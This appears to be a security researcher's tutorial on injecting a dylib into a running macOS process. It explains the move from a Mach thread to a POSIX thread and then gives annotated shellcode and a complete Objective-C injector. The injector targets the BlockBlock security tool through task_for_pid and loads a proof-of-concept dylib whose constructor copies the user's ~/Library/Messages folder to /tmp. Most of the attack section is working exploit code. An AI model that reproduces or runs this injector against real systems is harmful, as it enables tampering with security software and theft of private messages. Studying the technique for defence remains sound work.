Skip to main content

Inject a Dylib

Prompt Mach Thread to POSIX Thread

Threads are implemented in the Mach kernel, and each thread belongs to a task. However, being a POSIX-compliant system, threads can be also manipulated via the POSIX pthread API. Some parts of the system expect to work with pthread while other parts work with the Mach API, meaning we'll need to ensure the thread we create can conform to both. This duality doesn't cause issues with the execv system call we used earlier, so we didn't need to deal with it; however, with more complex function calls these issues can cause them to terminate or not work at all. 

In short: macOS supports both mach API and Unix API, this dual support can sometimes lead to complications. 

The previous thread injection relied on access to the remote process's task port, finally calling thread_create_running to start a thread. Mach threads are not created with a corresponding POSIX thread structure, meaning any call to the pthread API will fail. To work with pthread function calls, we should prompt Mach thread to POSIX thread.

Before 10.14(Mojave), it can be achieved through _pthread_set_self API with a NULL pointer.

void
_pthread_set_self(pthread_t p)
{
	return _pthread_set_self_internal(p, true);
}

static inline void
_pthread_set_self_internal(pthread_t p, bool needs_tsd_base_set)
{
	if (p == NULL) {
		p = &_thread;
	}

	uint64_t tid = __thread_selfid();
	if (tid == -1ull) {
		PTHREAD_ABORT("failed to set thread_id");
	}

	p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
	p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
	p->thread_id = tid;

	if (needs_tsd_base_set) {
		_thread_set_tsd_base(&p->tsd[0]);
	}
}

Since 10.14, the function code changed:

void
_pthread_set_self(pthread_t p)
{
#if VARIANT_DYLD
	if (os_likely(!p)) {
		return _pthread_set_self_dyld();
	}
#endif // VARIANT_DYLD
	_pthread_set_self_internal(p);
	_thread_set_tsd_base(&p->tsd[0]);
}

We notice _pthread_set_self_dyld and _pthread_set_self_internal. The dyld version is not accessible from user space, while another one is accessible.

void
_pthread_set_self_dyld(void)
{
	pthread_t p = main_thread();
	p->thread_id = __thread_selfid();

	if (os_unlikely(p->thread_id == -1ull)) {
		PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
	}

	p->tsd[_PTHREAD_TSD_SLOT_PTHREAD_SELF] = p;
	p->tsd[_PTHREAD_TSD_SLOT_ERRNO] = &p->err_no;
	_thread_set_tsd_base(&p->tsd[0]);
}
static inline void
_pthread_set_self_internal(pthread_t p)
{
	os_atomic_store(&p->thread_id, __thread_selfid(), relaxed);

	if (os_unlikely(p->thread_id == -1ull)) {
		PTHREAD_INTERNAL_CRASH(0, "failed to set thread_id");
	}
}

In this version, _pthread_set_self_internal will no longer set up the thread structure since it expects to find a valid thread structure already present. If we pass NULL in place of the thread structure pointer, the function will crash due to a NULL pointer dereference.

Therefore, another option _pthread_create_from_mach_thread comes.

/*
 * A version of pthread_create that is safely callable from an injected mach thread.
 *
 * The _create introspection hook will not fire for threads created from this function.
 *
 * It is not safe to call this function concurrently.
 */
__API_AVAILABLE(macos(10.12), ios(10.0), tvos(10.0), watchos(3.0))
(...)
int pthread_create_from_mach_thread(pthread_t * __restrict,
		const pthread_attr_t * _Nullable __restrict,
		void *(* _Nonnull)(void *), void * _Nullable __restrict);

This function allows a pthread to be created from a mach thread.

int
pthread_create_from_mach_thread(pthread_t *thread, const pthread_attr_t *attr,
		void *(*start_routine)(void *), void *arg)
{
	unsigned int flags = _PTHREAD_CREATE_FROM_MACH_THREAD;
	return _pthread_create(thread, attr, start_routine, arg, flags);
}

Compared to the original solution, this function will not promote our thread into a valid pthread, but create a new, valid pthread instead. Therefore, our plan is to use injected Mach thread to create a new, fully-configured pthread. We have to pass in an address that holds a pthread structure, and the location of the start routine. The other args can be NULL, i.e. pthread_create_from_mach_thread(address of a pthread structure, 0, location of the start routine ,0)

Shellcode

The shellcode should have 2 essential components:

  1. Create a new thread from our Mach thread, calling pthread_create_from_mach_thread.
  2. The new thread calls dlopen to load the dylib of our choice.

Complete shellcode:

;bootstrap Mach thread
_shellcode:
0:  55                      push   rbp                      ; function prologue
1:  48 89 e5                mov    rbp,rsp
4:  48 83 ec 10             sub    rsp,0x10
8:  48 8d 7d f8             lea    rdi,[rbp-8]              ; arg0=rdi=address of (rbp-8)
c:  48 31 f6                xor    rsi,rsi                  ; arg1=rsi=0
f:  48 31 c9                xor    rcx,rcx                  ; arg3=rcx=0
12: 48 8d 15 0e 00 00 00    lea    rdx,[rip+0xe]            ; arg2=rdx= address of (_thread)
19: 48 b8 50 54 48 52 44    movabs rax,0x5452434452485450   ; move addresss of pthread_create_from_mach_thread into rax
20: 43 52 54
23: ff d0                   call   rax                      ; call pthread_create_from_mach_thread
_jump:
25: eb fe                   jmp    25 <_jump>               ; infinite loop

;the new thread to start dlopen
_thread:
27: 55                      push   rbp                      ; function prologue
28: 48 89 e5                mov    rbp,rsp
2b: 48 83 ec 10             sub    rsp,0x10
2f: 6a 01                   push   0x1           
31: 5e                      pop    rsi                      ; arg1 = rsi = RTLD_LAZY
32: 48 8d 3d 12 00 00 00    lea    rdi,[rip+0x12]           ; arg0 = rdi = address of (_thread+0x24)
39: 48 b8 44 4c 4f 50 45    movabs rax,0x5f5f4e45504f4c44
40: 4e 5f 5f
43: ff d0                   call   rax                      ; call dlopen
45: 48 83 c4 10             add    rsp,0x10                 ; function epilogue   
49: 5d                      pop    rbp
4a: c3                      ret
4b: LIBLIBLIBLIB...                                         ; placeholder for our DYLIB string

In _shellcode section, we set rdi, which is the 1st arg to as an address to store the new pthread structure. Set rdx, which is the 3rd arg to point to the start routine of the new thread(+0x27) via RIP-relative addressing.

We set a placeholder value for rax at 0x19, which we will patch later. And there is an infinite loop to prevent the thread from exiting.

To call dlopen(), we new to pass 2 args.

void* dlopen(const char* path, int mode);

The preferred mode is 0x1.

#define RTLD_LAZY	0x1

rip+0x12 points to the 0x4b, where is the placeholder string.

We can use dlsym function to look up functions' addresses within dlfcn.h

The initial shellcode:

char shellcode[] =
"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x48\x8D\x7D\xF8"                // lea        rdi, qword [rbp-8]
"\x48\x31\xc9"                    // xor        rcx,rcx
"\x48\x31\xf6"                    // xor        rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00"    // lea        rdx, qword ptr [rip + 0xe]
"\x48\xB8"                        // movabs     rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0"                        // call       rax
"\xEB\xFE"                        // jmp        -2

"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x6A\x01"                        // push 1
"\x5E"                            // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00"    // lea        rdi, qword ptr [rip + 0x12]
"\x48\xB8"                        // movabs     rax, dlopen
"DLOPEN__"
"\xFF\xD0"                        // call       rax
"\x48\x83\xC4\x10"                // add        rsp, 0x10
"\x5D"                            // pop        rbp
"\xC3"                            // ret

"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

However, we need to patch placeholder values before the injection.

Apart from using dlsym, we can also refer to the function directly to get their addresses, e.g. importing pthread.h header.

        char* lib = "/tmp/bb.dylib";
        uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
        uint64_t addr_of_dlopen = (uint64_t)dlopen;
    
        char *possible_patch_location = (shellcode);
        int i=0;
        for (i = 0; i < 0x100; i++) {
            possible_patch_location++;
    
            if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
                printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
                memcpy(possible_patch_location, &addr_of_pthread_create, 8);
            }
    
            if (memcmp(possible_patch_location, "DLOPEN__", 6) == 0) {
                printf("dlopen @%llx\n", addr_of_dlopen);
                memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
            }
    
            if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
                strcpy(possible_patch_location, lib);
            }
        }

pthread_create_from_mach_thread's address was obtained via dlsym function, while dlopen's address was obtained via type casting.

Create a poc for the dylib:

#include <stdlib.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
    system("cp -r ~/Library/Messages/ /tmp/Messages/");
    exit(0);
}

Complete code:

 #import <Foundation/Foundation.h>
 #import <AppKit/AppKit.h>
 #include <mach/mach_vm.h>
 #include <sys/sysctl.h>
 #include <dlfcn.h>
 #include <pthread.h> 

 #define STACK_SIZE 0x1000
 #define CODE_SIZE 128
 
char shellcode[] =
"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x48\x8D\x7D\xF8"                // lea        rdi, qword [rbp-8]
"\x48\x31\xc9"                    // xor        rcx,rcx
"\x48\x31\xf6"                    // xor        rsi,rsi
"\x48\x8D\x15\x0E\x00\x00\x00"    // lea        rdx, qword ptr [rip + 0xe]
"\x48\xB8"                        // movabs     rax, pthread_create_from_mach_thread
"PTHRDCRT"
"\xFF\xD0"                        // call       rax
"\xEB\xFE"                        // jmp        -2

"\x55"                            // push       rbp
"\x48\x89\xE5"                    // mov        rbp, rsp
"\x48\x83\xEC\x10"                // sub        rsp, 0x10
"\x6A\x01"                        // push 1
"\x5E"                            // pop rsi
"\x48\x8D\x3D\x12\x00\x00\x00"    // lea        rdi, qword ptr [rip + 0x12]
"\x48\xB8"                        // movabs     rax, dlopen
"DLOPEN__"
"\xFF\xD0"                        // call       rax
"\x48\x83\xC4\x10"                // add        rsp, 0x10
"\x5D"                            // pop        rbp
"\xC3"                            // ret

"LIBLIBLIBLIB"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
 
 uid_t get_uid(pid_t pid)
 {
     uid_t uid = 0;
 
     struct kinfo_proc process;
     size_t buffer_size = sizeof(process);
     
     // Compose search path for sysctl. Here you can specify PID directly.
     const u_int mib_len = 4;
     int mib[mib_len] = {CTL_KERN, KERN_PROC, KERN_PROC_PID, pid};
     int sysctl_result = sysctl(mib, mib_len, &process, &buffer_size, NULL, 0);
 
     // If sysctl did not fail and process with PID available - take UID.
     if ((sysctl_result == 0) && (buffer_size != 0)) {
         uid = process.kp_eproc.e_ucred.cr_uid;
     }
     return uid;
 }
 
 pid_t get_pid(NSString* bundle_id) {
     
     pid_t pid = 0;
     uid_t uid = -1;
     //find applications with bundle ID
     NSArray *runningApplications = [NSRunningApplication runningApplicationsWithBundleIdentifier:bundle_id];
     //check if any found at all
     if (runningApplications.count > 1) {
         for (id app in runningApplications) {
             pid = [app processIdentifier];
             uid = get_uid(pid);
             if (uid != 0) {
                 //if not root (=0) return
                 return pid;
             }
         }
     }
     //if we got here, t means that we didn't find an instance
     printf("[-] There is no instance of the application running as user, exiting...\n");
     exit(-1);
 }
 
 int main(int argc, const char * argv[]) {
         
         pid_t pid = get_pid(@"com.objectiveSee.BlockBlock");
 
         task_t remoteTask;
         kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask);
               
         if (kr != KERN_SUCCESS) {
               printf("[-] Failed to get task port for pid:%d, error: %s\n", pid, mach_error_string(kr));
               return(-1);
             }
         else {
             printf("[+] Got access to the task port of process: %d\n", pid);
         }
         
         mach_vm_address_t remoteStack64 = (vm_address_t) NULL;
         mach_vm_address_t remoteCode64 = (vm_address_t) NULL;
 
         kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to allocate stack memory in remote thread, error: %s\n", mach_error_string(kr));
             exit(-1);
         } else {
             printf("[+] Allocated remote stack: 0x%llx\n", remoteStack64);
         }
 
         kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE );
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to allocate code memory in remote thread, error: %s\n", mach_error_string(kr));
             exit(-1);
         } else {
             printf("[+] Allocated remote code placeholder: 0x%llx\n", remoteCode64);
         }

        char* lib = "/tmp/bb.dylib";
        uint64_t addr_of_pthread_create = (uint64_t)dlsym(RTLD_DEFAULT, "pthread_create_from_mach_thread");
        uint64_t addr_of_dlopen = (uint64_t)dlopen;
    
        char *possible_patch_location = (shellcode);
        int i=0;
        for (i = 0; i < 0x100; i++) {
            possible_patch_location++;
    
            if (memcmp(possible_patch_location, "PTHRDCRT", 8) == 0) {
                printf("pthread_create_from_mach_thread @%llx\n", addr_of_pthread_create);
                memcpy(possible_patch_location, &addr_of_pthread_create, 8);
            }
    
            if (memcmp(possible_patch_location, "DLOPEN__", 6) == 0) {
                printf("dlopen @%llx\n", addr_of_dlopen);
                memcpy(possible_patch_location, &addr_of_dlopen, sizeof(uint64_t));
            }
    
            if (memcmp(possible_patch_location, "LIBLIBLIB", 9) == 0) {
                strcpy(possible_patch_location, lib);
            }
        }
         
         kr = mach_vm_write(remoteTask, remoteCode64, (vm_address_t) shellcode, CODE_SIZE);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Failed to write into remote thread memory, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
         
         kr  = vm_protect(remoteTask, remoteCode64, CODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
 
         if (kr != KERN_SUCCESS) {
             printf("[!] Failed to give injected code memory proper permissions, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
 
         kr  = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE);
 
         if (kr != KERN_SUCCESS) {
             printf("[!] Failed to give stack memory proper permissions, error: %s\n", mach_error_string(kr));
             exit(-1);
         }
 
         x86_thread_state64_t remoteThreadState64;
 
         memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) );
 
         //shift stack
         remoteStack64 += (STACK_SIZE / 2); // this is the real stack
 
         // set remote instruction pointer
         remoteThreadState64.__rip = (u_int64_t) remoteCode64;
 
         // set remote Stack Pointer
         remoteThreadState64.__rsp = (u_int64_t) remoteStack64;
         remoteThreadState64.__rbp = (u_int64_t) remoteStack64;
 
         printf ("[+] Remote Stack 64  0x%llx, Remote code is 0x%llx\n", remoteStack64, remoteCode64 );
     
         //thread variable
         thread_act_t remoteThread;
 
         //create thread
         kr = thread_create_running( remoteTask, x86_THREAD_STATE64,
            (thread_state_t) &remoteThreadState64, x86_THREAD_STATE64_COUNT, &remoteThread);
 
         if (kr != KERN_SUCCESS) {
             printf("[-] Exploit failed: error: %s\n", mach_error_string (kr));
             return (-1);
         }
         
         printf("[+] Exploit succeeded! Check /tmp/\n");

         return (0);

 }

Compile them:

image.png

The exploit works.

image.png

My question: Is it possible to use db 'String', 0 instruction to replace the patch?